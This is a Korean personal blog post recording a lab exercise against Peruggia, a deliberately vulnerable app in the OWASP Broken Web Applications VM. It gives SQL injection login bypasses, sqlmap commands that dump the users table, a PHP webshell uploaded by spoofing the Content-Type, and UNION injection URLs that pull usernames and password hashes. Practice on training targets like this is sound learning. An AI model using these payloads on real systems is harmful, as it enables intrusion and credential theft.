owasp 실습 (peruggia)

2020. 12. 7. 11:07·Web hacking

 

sourceforge.net/projects/owaspbwa/files/latest/download

 

OWASP download하기.

vmware에 올리고

 

자기 ip들어가기

 

 

 

 

 

 

peruggia 계정정보 탈취하기.

 

 

 

1) 첫번쨰 방법 로그인

 

' or '1'='1'#

 

 

 

2) 파일업로드를 이용한 계정탈취

 

 

 

php 파일을만들고

 

 

 

 

 

upload한뒤 burp suite로 프록시를잡는다

 

 

 

 

 

그리고 content-Type : appli~이것을

 

content-Type :image/png로 변환한다

 

 

 

그리고

 

 

 

 

 

 

 

forward한뒤

 

저파일올라온것을 클릭하면

 

 

 

 

 

계정탈취가 가능하다~!

 

 

 

 

 

 

-------------------------------------------------------

 

 

 

 

 

3) sqlmap 도구 활용

 

 

 

위치 복사후

 

 

 

 

 

 

1.현재사용중인 데이터베이스 목록

 

python sqlmap.py sqlmap --current-db -u "http://192.168.0.225/peruggia/index.php?action=comment&pic_id=53" --batch

 

 

 

 

 

2 .테이블 목록

python sqlmap.py sqlmap -D perguggia --tables -u "http://192.168.0.225/peruggia/index.php?action=comment&pic_id=53" --batch

 

3. 

python sqlmap.py sqlmap-u "http://192.168.0.225/peruggia/index.php?action=comment&pic_id=53" -D peruggia -T users --batch -dump

 

 

 

 

 

-----------------------------------------------------------------

메모장에 새로운 방법.

 

1) 

 

<? php passthru(GET_['cmd']);?>

<? php apssthru('넣고싶은 명령어');?

 

2)

<? php phpinfo(); ? >

 

 

 

 

 

 

 

3)

 

http://192.168.0.225/peruggia/index.php?action=account

<action name=account href="./account.php">

 

 

 

 

 

-----------------------------------

 

 

union sql injection

 

 

--------------------------------------

 

 

 

 

next

 

 

 

 

 

 

 

index.php?action=comment&pic_id=119

 

 

 

 

 

 

 

 

 

union sql injection

 

 

1)

 

 

http://192.168.0.225/peruggia/index.php?action=comment&pic_id=1 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#;

 

 

 

 

 

 

 

 

 

 

2)

 

 

http://192.168.0.225/peruggia/index.php?action=comment&pic_id=1 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

 

 

 

 

 

 

 

 

 

 

 

 

 

3)

 

 

http://192.168.0.225/peruggia/index.php?action=comment&prc_id=1 union all select 1,2,3,database()#

 

 

 

 

 

 

 

 

 

 

4)

 

 

1 and 1=2 union all select 1,2,3,group_concat(username) from peruggia.users#

 

 

 

 

 

 

5)

 

--- 패스워드 해쉬크랙

 

 

 

 

1 and 1=2 union all select 1,2,3,group_concat(password) from users#

 

 

 

해쉬 크랙하면된다.

 

 

'Web hacking' 카테고리의 다른 글

oswasp 실습(BodgeIt)  (0) 2020.12.07
owasp 실습(WackoPicko)  (0) 2020.12.07
파일업로드 취약점,소스코드공개될때 가능한취약점  (0) 2020.12.01
웹해킹 파일업로드 취약점  (0) 2020.12.01
csrf(크로스사이트 요청위조),좀비  (0) 2020.12.01
'Web hacking' 카테고리의 다른 글
  • oswasp 실습(BodgeIt)
  • owasp 실습(WackoPicko)
  • 파일업로드 취약점,소스코드공개될때 가능한취약점
  • 웹해킹 파일업로드 취약점
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    owasp 실습 (peruggia)
    상단으로

    티스토리툴바